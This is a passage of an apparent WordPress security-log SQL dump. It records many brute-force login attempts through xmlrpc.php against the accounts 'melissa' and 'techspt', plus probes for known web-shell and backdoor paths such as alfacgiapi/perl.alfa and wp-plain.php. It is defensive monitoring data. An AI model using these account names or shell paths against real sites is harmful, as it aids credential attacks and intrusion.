lrpc.php',0,0,0),('143.42.194.250',2401944314,'melissa',0,1680792458.3657,152,'RQptFTZCc3VjGMPxb50eK7AB','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('139.59.62.4',2335915524,'melissa',0,1680792473.1845,152,'FNVEQjYeMPkWyfJ9h8bO0pAt','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('198.71.235.60',3326602044,'melissa',0,1680792476.9770,152,'2c7iVgYlMpJA6hEkf1P3nQxR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.144.123.73',865106761,'melissa',0,1680792479.1526,152,'QVi6pJ0qLPTRIWAvakcugBZf','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.23.226.46',1125638702,'melissa',0,1680792487.2055,152,'LXjGrQUlSsmbain6t1dAFC28','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('34.95.136.51',576686131,'melissa',0,1680792489.1785,152,'iI3ruQnkfY96wF0BJov5sljx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.144.123.73',865106761,'melissa',0,1680792492.7884,152,'kFK4rHztpeA9IXxDbaiYjUdN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.144.123.73',865106761,'',0,1680792492.7928,10,'kFK4rHztpeA9IXxDbaiYjUdN','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('47.88.33.72',794304840,'melissa',0,1680793305.2440,152,'Z3uObFSGrRxaVh8X1Bgd02mI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.241.139.132',3354495876,'melissa',0,1680793305.5987,152,'tFRGhivnl79PzaqsjmBeU5fV','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1680793315.8707,152,'i6bfYO1Z4n9VTQkINqox3X7l','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.77.175.167',760065959,'melissa',0,1680793319.0097,152,'1SZIvoAzEKtmJPk3cDXygxQl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('173.212.199.147',2916403091,'melissa',0,1680793325.9093,152,'yXC4neGxszMuFOjr2i8NY7q3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.3.1.158',1728250270,'melissa',0,1680793332.7034,152,'vQktzRdu6APyxUfqsKh38MpO','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680793334.8363,152,'DWp9w50yPYJUge4LRNEoISZl','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('201.149.91.174',3382008750,'melissa',0,1680793342.4032,152,'qVRi9tQrCoEMsKYAb2jzeymI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.255.237.9',1744825609,'melissa',0,1680793348.9577,152,'e75WR46lNpJQkIEnfKu9i1ZC','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.130.229.130',763553154,'melissa',0,1680793355.8414,152,'O0A1h83XeJz4cGHoduW5isZB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('45.162.228.171',765650091,'techspt',0,1680793612.5199,152,'QbOAGtflZm5r6zXheR3NLvU7','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.254.153.99',1744738659,'techspt',0,1680794630.3968,152,'CSsR7dxOHAE4TFWQwcGfzVr0','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.200.116.211',3116922067,'techspt',0,1680795815.9281,152,'gkC31rmcx4QIHVJbDPUA7uXa','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1680797306.5501,152,'TO5adz2LIPUgN6pQreV9WqlS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.93.124',2682215804,'melissa',0,1680797306.5524,152,'5IBn9ZtCvdmGJ7gpDYuzcVQU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'melissa',0,1680797313.4469,152,'Iys40wbMO6jLKAPR5uEeS3ag','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'melissa',0,1680797315.7154,152,'tBUOYAQzMXJxmC7I0GR3Hg4Z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('163.172.60.103',2745973863,'melissa',0,1680797319.1900,152,'a6VQk7UAdpe5qbDHvOr2uNmc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.20.75.229',1091849189,'melissa',0,1680797319.4659,152,'sVjhHczTriSAa0ldmnoQb3Uv','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.69.17',1218921745,'melissa',0,1680797323.3692,152,'nlw4EQqgUZsctTVhOF8rx9YA','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('46.105.97.186',778658234,'melissa',0,1680797324.9677,152,'1GYUxKZMWACi6tNP7R5SrJOX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('140.174.6.37',2360215077,'melissa',0,1680797331.1178,152,'EReU3DGwFiTqSY8r4OagBloL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.187',1152553403,'melissa',0,1680797341.1722,152,'FT8jiR6G3rMdOnDNeS4VakCy','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.204.46.91',1540107867,'melissa',0,1680797656.9612,152,'2n7UwufDq3FYAVEbzR0eTSJ9','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('130.69.94.131',2185584259,'melissa',0,1680797662.7911,152,'AfsrvDZ2XBiG8UEVT1Nwjqdm','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680797664.5650,152,'cPQ4idpgq1EBUDkuh9r2FntR','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('130.69.94.131',2185584259,'melissa',0,1680797671.1868,152,'YUfFaVkMr8BZSj1iWtqDmNnb','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('130.69.94.131',2185584259,'',0,1680797671.1907,10,'YUfFaVkMr8BZSj1iWtqDmNnb','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('199.241.137.45',3354495277,'melissa',0,1680797677.3017,152,'t8v6WgDI2Rzq3Fc4SdMswKTU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('173.231.231.50',2917656370,'melissa',0,1680797683.3468,152,'yfv2QOqpPat0F639bxsNiuIG','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('91.107.196.183',1533789367,'melissa',0,1680797683.8717,152,'hM4ywfzFi8ukveHU32YdtDKL','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680797696.4795,152,'c2U9N3hw0IFWHX6bOmlny5pa','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'',0,1680797696.4839,10,'c2U9N3hw0IFWHX6bOmlny5pa','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('185.151.196.183',3113731255,'melissa',0,1680797700.4437,152,'0FJ8g62Enmy5eMuWjLCcoSZH','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('62.102.148.166',1046910118,'techspt',0,1680798289.5311,152,'cwvSxeTlUQtIuVmdks1LjFRo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('20.40.54.253',338179837,'',0,1680800502.1536,10,'cuonVe3T17QN4zHxRKvg9bdt','','707|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,707,0),('20.40.54.253',338179837,'',0,1680800505.0720,100,'3ILaXc1ZAksnfHdURuQGC5El','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('20.40.54.253',338179837,'',0,1680800505.0780,18,'0GOBm1gJAVkezxHX5rb29uLM','','13|0|0|0|cmdev-site1.com/wp-plain.php',0,13,0),('20.40.54.253',338179837,'',0,1680800506.4488,18,'qzObZS2NFdYjg5LyJnpacGh4','','13|0|0|0|cmdev-site1.com/alfacgiapi/perl.alfa',0,13,0),('20.40.54.253',338179837,'',0,1680800507.7504,100,'tihjTN5yYZpdEImuVL9KrRka','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php',0,13,0),('20.40.54.253',338179837,'',0,1680800508.4652,100,'ikplzLZwuUy4oCNWPj0dY7TV','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php',0,13,0),('20.40.54.253',338179837,'',0,1680800509.2651,100,'isIZKFk3cQeS2AUVqN7aLbjp','','13|0|0|0|cmdev-site1.com/wp-content/plugins/apikey/apikey.php.suspected',0,13,0),('20.40.54.253',338179837,'',0,1680800510.0750,100,'7lz3pYFmgwVPRKyiTCfSkHAo','','13|0|0|0|cmdev-site1.com/plugins/content/apismtp/apismtp.php.suspected',0,13,0),('68.235.48.108',1156264044,'techspt',0,1680801286.1468,152,'60JCR4gkzecKMbHStdhvY9Fj','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.203',3091979723,'techspt',0,1680802103.6996,152,'mQXthgOx0jML5HC7bs4ye1fk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('209.236.124.38',3521936422,'melissa',0,1680802803.5822,152,'r7psUxq4GyWokMH8vm0PcBh6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.9.227.178',1728701362,'melissa',0,1680802811.0777,152,'b4x8jGh576t3nlSEmscJKQBL','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('140.174.6.37',2360215077,'melissa',0,1680802811.4126,152,'Kik1WAdrgBYlbCDQ4sXvhj5Z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('13.75.144.52',223055924,'melissa',0,1680802818.7200,152,'r0CIdw1oByAGTM96ljOvkbXU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'melissa',0,1680802822.9497,152,'pfX9kumR46C87WFKonhM3UeV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.9.227.178',1728701362,'melissa',0,1680802826.0037,152,'oLgSdRZfDTaXx4UOsehQIGF9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.9.227.178',1728701362,'',0,1680802826.0061,10,'oLgSdRZfDTaXx4UOsehQIGF9','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('128.199.90.99',2160548451,'melissa',0,1680802830.1561,152,'S7aoNBUZfTm2HxweI53XCWhV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.187',1152553403,'melissa',0,1680802830.2860,152,'kFhSCb9Ipro6Ws7P3Y1TUN2B','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('72.167.69.17',1218921745,'melissa',0,1680802835.5086,152,'mW531NupABQgDe4w0iFPHCGS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'melissa',0,1680802840.4216,152,'Md1gwz7bh60lcCavuGfAijUs','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.72.210.101',2487800421,'',0,1680802840.4259,10,'Md1gwz7bh60lcCavuGfAijUs','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('68.183.83.210',1152865234,'melissa',0,1680802842.6905,152,'tIuGL1YDWFmUhEqbj8fPBRcN','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('86.105.9.67',1449724227,'techspt',0,1680803644.0787,152,'82ArYNILB47gn0oduQZDPmkz','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('137.184.211.244',2310591476,'melissa',0,1680805159.4971,152,'5ygqWwhrcuItCaTdRjiZHNL8','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('173.212.199.147',2916403091,'melissa',0,1680805159.5045,152,'83jmT9z0NaF6PMpJC5AVghri','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('101.50.2.67',1697776195,'melissa',0,1680805160.9858,152,'cJtPV0fZLjIx5NeC3SR1pQXT','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('178.162.204.238',2997013742,'techspt',0,1680805330.9828,152,'kcyfAldQe4pwaGT3mFIRKXgx','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('31.170.22.49',531240497,'melissa',0,1680806018.2491,152,'P3UA0hiflmFwuNDR5QTCSj9V','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.170.22.49',531240497,'melissa',0,1680806028.2042,152,'z5RjsQtq0k3prNB7Z1MDdEew','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('31.170.22.49',531240497,'',0,1680806028.2070,10,'z5RjsQtq0k3prNB7Z1MDdEew','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('103.124.94.44',1736203820,'melissa',0,1680806032.6615,152,'1GsWg2fuDEy93XxhTSLoVKNp','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('137.184.211.244',2310591476,'melissa',0,1680806033.0451,152,'Z2Bltp8r9gW5Q4UsvPY0u7Gf','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('137.184.211.244',2310591476,'',0,1680806033.0494,10,'Z2Bltp8r9gW5Q4UsvPY0u7Gf','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('92.205.17.155',1556943259,'melissa',0,1680806042.6639,152,'Z8u7rxlzaUNSI1bpV6BHKFRJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('139.162.104.127',2342676607,'melissa',0,1680806042.8765,152,'jLsFcf5w3xA7OBpQReuVXoyI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'melissa',0,1680806064.9498,152,'bHlPxkcYKjCmgofyei28UQWM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('213.152.186.40',3583556136,'techspt',0,1680806070.2685,152,'N1Lzo3UXtWKQFb6VgaSRjxqZ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('142.93.223.16',2388516624,'melissa',0,1680806809.7402,152,'lpC8tenNU9AsB2Kj0vMLRZJ5','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('91.200.103.0',1539860224,'melissa',0,1680806820.4861,152,'0WRow7AVmi6HyKGsgen2M3uX','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('45.130.104.194',763521218,'melissa',0,1680806823.2874,152,'I3vJUjbTEQeXqZdBki5gtfa9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.156.133',1109236869,'melissa',0,1680806823.6964,152,'M9idkzpRElWQBftY6seJZjOG','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('104.225.237.131',1759636867,'melissa',0,1680806831.3513,152,'ohqdQADWKUur7gBx42wtYzTJ','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('148.66.147.20',2487390996,'melissa',0,1680806831.5138,152,'XnycEY9s0TWZOJ4H26le8LBw','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1680806837.6630,152,'6v48XisBEKau7cqobtQDrWfI','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'melissa',0,1680806843.5579,152,'MWN34VDZI671qkcpevbwBFQi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('207.180.210.110',3484734062,'',0,1680806843.5601,10,'MWN34VDZI671qkcpevbwBFQi','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('81.208.11.40',1372588840,'melissa',0,1680806843.7828,152,'nVDq6d7EpXbQ0IaZPKyjN8xi','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('67.205.178.151',1137554071,'melissa',0,1680806855.3861,152,'0YqsnzKXvMemSRV6I2JiGlBc','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('141.98.102.179',2372036275,'techspt',0,1680812596.4112,152,'4vAW2tJRY1O0SiPkVuKeGB56','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('128.127.105.184',2155833784,'techspt',0,1680812901.2698,152,'9rIpeRyY15k2ESj7ZsDGX3JP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.94.107.15',1113484047,'melissa',0,1680813253.5017,152,'KohqXWAvZjGldMgDBOCEiVP0','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.241.137.45',3354495277,'melissa',0,1680813255.1328,152,'xqtkjubXDAMWci8nGTBFoaO7','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.163.200.46',3114518574,'melissa',0,1680813263.2590,152,'LsybkctP8uETvWCepd4hnMRU','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('198.27.98.143',3323683471,'melissa',0,1680814135.1185,152,'cLHkpKg9RJY0Vai4MfAtNl2x','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('81.181.130.56',1370849848,'melissa',0,1680814138.0446,152,'6SJqNncItoU8ykdOxp9GXP40','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('137.184.211.244',2310591476,'melissa',0,1680814139.5465,152,'p8DeLsChKAScu3wPiRY2lt19','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('14.225.192.104',249675880,'melissa',0,1680814146.6084,152,'9QFysfXgoAi8plhGOL4jaqt2','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.68.47.117',3158585205,'melissa',0,1680814148.6742,152,'gNSxBEptLFc3Y4JzwGyQbsjM','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('155.94.140.179',2606664883,'melissa',0,1680814165.8565,152,'ySwrTvM5nj9Y1XDFa7zuA8eq','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('185.179.82.133',3115537029,'melissa',0,1680814176.6732,152,'oftKjAZMIcH4mFOEkVus1Qln','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('54.38.242.51',908522035,'melissa',0,1680814183.3942,152,'wm41WGE5S0onx7FdLK8aqNUy','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('123.56.69.68',2067285316,'melissa',0,1680814184.3019,152,'ypTaWjhd1eHANrgIU5MLSCQ3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('188.128.149.108',3162543468,'melissa',0,1680814475.9914,152,'mTe9sfxS4CpzlZGgW2nEJDVu','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('209.58.177.202',3510284746,'melissa',0,1680814476.6301,152,'hBHUCDatYpoEeQJwbXfd5R6N','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.187',1152553403,'melissa',0,1680814480.1835,152,'HWnzVOEvQKpmMSr0Y6BUP2Nk','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('15.206.123.128',265190272,'melissa',0,1680814488.3941,152,'TYqZ28FanvjmhJGxgKUPl9uV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('93.186.120.193',1572501697,'melissa',0,1680814497.1657,152,'3JSRyXQFxVHkEnhdurqZiIGU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('159.223.71.186',2682210234,'melissa',0,1680814605.9320,152,'rzfkhga0ZtxV1bWXDC7LEcK8','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.131',1152553347,'melissa',0,1680816425.9359,152,'5XR8bfkxrYWLHl7VJwuSGMto','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.138.150.26',1737135642,'melissa',0,1680816430.6922,152,'3o4m2pHKygLGjwvXReiOZuCs','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.230.114.25',2649125401,'melissa',0,1680816433.3451,152,'hIfvSpNPDRYFgxl4WEoe6mn2','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.59.206.66',3258699330,'melissa',0,1680816441.1609,152,'oGrWJpM2cm6gVYZX3OaFzSvu','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.3.1.158',1728250270,'melissa',0,1680816449.8619,152,'wD2qSye9gJUGQNZdTta7WAb6','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('86.48.23.13',1445992205,'melissa',0,1680816453.3208,152,'Gbvydpk5qFfYKxD6uHgWtSN3','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.191.83',804437843,'melissa',0,1680816460.1013,152,'Eg79jkT6AiCHr4lMxnUbD8PN','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'melissa',0,1680816469.8633,152,'Mhv8egREFzBYVjx7JDmNQXIy','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.59.206.66',3258699330,'melissa',0,1680816476.8345,152,'vjMLgBYFqH0uG3cmSn1dPeob','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('194.59.206.66',3258699330,'',0,1680816476.8368,10,'vjMLgBYFqH0uG3cmSn1dPeob','','701|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,701,0),('185.156.174.115',3114053235,'techspt',0,1680818296.8726,152,'bcJqVpHo2FL3GmyrgzviTl4N','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.152.79.248',1738035192,'melissa',0,1680818634.0637,152,'lRAGwTq2x6PFda45Bh1gVZms','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('113.190.234.69',1908337221,'melissa',0,1680818635.4458,152,'H4Nal5GBYSTeUrWvioqKPmpR','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('68.178.145.169',1152553385,'melissa',0,1680818635.4758,152,'gYNBv4xk2hCroLRUaGAtJqQE','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('103.92.235.82',1734142802,'melissa',0,1680818645.6626,152,'HinP0TmxWqEtkZ6sI5eQzpoU','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('120.27.216.32',2015090720,'melissa',0,1680818654.6036,152,'OQiIB1kGt8FynMP96r3JaLZh','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('51.144.123.73',865106761,'melissa',0,1680818656.5518,152,'g86es3dr0BEML2HclzF9IbTC','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('185.182.57.22',3115727126,'melissa',0,1680818658.5058,152,'HLeo49ng3Z6CwBuiOplca7If','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.29.132.22',1109230614,'melissa',0,1680818668.7564,152,'XztIq5rTxMe7WhoAm6DjQwLg','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('65.20.75.229',1091849189,'melissa',0,1680818672.8212,152,'FlDQkj0o5UGLbqxwO71a9CTV','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('152.67.12.146',2554530962,'melissa',0,1680818684.8582,152,'MdCopjxaDS0eZthN6EOPnbk9','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('194.38.23.179',3257276339,'',0,1680820476.1356,55,'ciB6PQuMgGOaY0LIsJFThU2V','','19|0|0|0|cmdev-site1.com/assets/global/plugins/plupload/examples/upload.php',0,19,0),('122.114.158.225',2054332129,'melissa',0,1680820666.9126,152,'vIzRgbjuxoT3DlBY4cd9KrMZ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('137.184.211.244',2310591476,'melissa',0,1680820667.9990,152,'4Dk1qeRJLlFzcCrWhuoa03Ai','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('47.242.191.83',804437843,'melissa',0,1680820670.1330,152,'CIHiEucg3VhYmj1RratQU0BJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('159.203.161.65',2680922433,'melissa',0,1680820685.4456,152,'xN123dKVO9AQluf5gqiXcCDI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('104.215.82.71',1758941767,'melissa',0,1680820687.8487,152,'zKq5ADEo2dHFy9tC3MNc6Ber','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.230.114.25',2649125401,'melissa',0,1680820691.3794,152,'FUZ0gijezGqOTn93HoICv62a','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('109.169.53.7',1839805703,'melissa',0,1680820696.1184,152,'FE4XyYaARVQoL1SDPmHb3d6k','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('92.205.17.155',1556943259,'melissa',0,1680820702.7810,152,'3uoEPkg8Bp4AmKlsbeqOhWNz','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('5.22.249.133',85391749,'melissa',0,1680820703.3024,152,'KOsFq4gCcj7PVIoaAmdevrkB','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('203.154.39.241',3415877617,'melissa',0,1680820709.7765,152,'axf5FLiKC8ENRTrnw2VPcem1','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('149.129.53.70',2508272966,'melissa',0,1680820710.3551,152,'kgq8vtXmoY0HAiVUR9DNs6zK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.147.130.161',1737720481,'melissa',0,1680820721.4301,152,'k8ds1NjJ0MiylfUrRQ5Xb3Sq','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('184.75.221.43',3091979563,'techspt',0,1680821644.3534,152,'YqFc6W8pvRAHiwh3EBjUxDTP','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('184.75.221.35',3091979555,'techspt',0,1680821727.0238,152,'mqDtcJVYfUzvwoWn4dNkgZL6','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.249',3583549945,'techspt',0,1680822428.0071,152,'DsZu6iVx4MbdLv1poAWg0Icl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('213.152.161.244',3583549940,'techspt',0,1680823996.5321,152,'MnwxXJzrptfKs7A3UkNdWEPo','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('146.70.115.139',2454090635,'techspt',0,1680825433.0441,152,'2Pcaveuzk37hUtQFwbrNgx8J','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('92.205.3.167',1556939687,'melissa',0,1680825576.0613,152,'lP1dKeMzh8qYSgvsTnAwWfyJ','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('81.181.130.56',1370849848,'melissa',0,1680825580.1397,152,'7bUpzWxcRaZsnD1OPmI6iFrh','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('199.241.137.45',3354495277,'melissa',0,1680825582.8331,152,'bO8n2cPRTJlUauZprz3t9xkj','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('65.21.239.153',1091956633,'melissa',0,1680825592.4659,152,'IJWteczpiSEjG83F19gd7oDK','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('129.226.138.214',2179107542,'melissa',0,1680825608.1726,152,'H06WJey7jFGkU3MvXz14NQqm','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('103.124.94.44',1736203820,'melissa',0,1680825612.0245,152,'Pltf7zZT3LFWJm8uXxse5gyI','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('157.230.114.25',2649125401,'melissa',0,1680825620.9789,152,'8SFA3LdgJlwvprqk2CUBVG9x','','0|0|0|0|cmdev-site1.com.corridormediadesign.com/xmlrpc.php',0,0,0),('77.247.126.152',1308065432,'melissa',0,1680825624.0679,152,'ReTh1XG69MZJHzb7C0l5